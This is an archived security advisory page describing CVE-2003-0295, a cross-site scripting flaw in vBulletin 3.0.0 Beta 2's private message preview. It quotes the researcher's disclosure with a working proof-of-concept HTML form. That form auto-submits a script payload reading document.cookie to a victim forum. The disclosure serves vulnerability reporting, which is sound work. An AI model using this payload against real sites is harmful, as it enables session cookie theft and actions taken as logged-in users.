SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   vBulletin Vendors:   Jelsoft Enterprises
vBulletin Input Validation Hole in Private Message Preview Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1006758
SecurityTracker URL:  http://securitytracker.com/id/1006758
CVE Reference:   CVE-2003-0295   (Links to External Site)
Updated:  Feb 28 2004
Original Entry Date:  May 15 2003
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included:  Yes  
Version(s): 3.0.0 Beta 2
Description:   An input validation vulnerability was reported in vBulletin in the previewing of private messages. A remote user can conduct cross-site scripting attacks.

It is reported that the 'private.php' script does not properly filter user-supplied input. A remote user can create a specially crafted web form or URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the vBulletin and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The report indicates that the target user may be required to be currently logged in for the exploit to work.

A demonstration exploit web form is provided in the Source Message.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running vBulletin, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.vbulletin.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: vBulletin Input Validation Hole in Private Message Preview Permits Cross-Site Scripting Attacks
A fix is available.



 Source Message Contents

Subject:  VBulletin Preview Message - XSS Vuln


------------------------------------------------------
VBulletin Private Message "Preview Message" XSS Vulnerability
------------------------------------------------------
Any kind of XSS attacks possibility.

------------------------------------------------------
About VBulletin;
------------------------------------------------------
PHP Based Popular Forum Application
Vendor & Demo;
http://www.vbulletin.com/

------------------------------------------------------
Vulnerable;
------------------------------------------------------
vBulletin 3.0.0 Beta 2

------------------------------------------------------
Non Vulnerable;
------------------------------------------------------
vBulletin 2.2

------------------------------------------------------
Vendor Status;
------------------------------------------------------
I can not contact vendor for this issue ! No patch available at the moment;

------------------------------------------------------
Solution;
------------------------------------------------------
HTML Encoding like post thread preview page;

------------------------------------------------------
Exploit Code;
------------------------------------------------------
<html>
<body>
 <form action="http://[victim]/forum/private.php" method="post"
name="vbform">
  <input type="hidden" name="do" value="insertpm" />
  <input type="hidden" name="pmid" value="" />
  <input type="hidden" name="forward" value="" />
  <input type="hidden" name="receipt" value="0" />

  <input type="text" class="bginput" name="title" value="" size="40"
tabindex="2" />
  <textarea name="message" rows="20" cols="70" wrap="virtual"
tabindex="3"></textarea>
  <input type="submit" class="button" name="sbutton" value="Post Message"
accesskey="s" tabindex="4" />
  <input type="submit" class="button" value="Preview Message" accesskey="p"
name="preview" onclick="this.form.dopreview = true; return
true;this.form.submit()" tabindex="5" >

  <input type="checkbox" name="savecopy" value="1" id="cb_savecopy"
checked="checked" />
  <input type="checkbox" name="signature" value="1" id="cb_signature"  />
  <input type="checkbox" name="parseurl" value="1" id="cb_parseurl"
checked="checked" />
  <input type="checkbox" name="disablesmilies" value="1"
id="cb_disablesmilies"  />
 </form>
<script>
 //Set Values and Submit
 // You can write your own JS codes
 var xss = "\"><script>alert(document.cookie)<\/script>";
 document.vbform.title.value=xss;
 document.vbform.preview.click();
</script>
</body>
</html>


*You may need login first


Ferruh Mavituna
Web Application Security Consultant
Freelance Developer & Designer
http://ferruh.mavituna.com
ferruh@mavituna.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC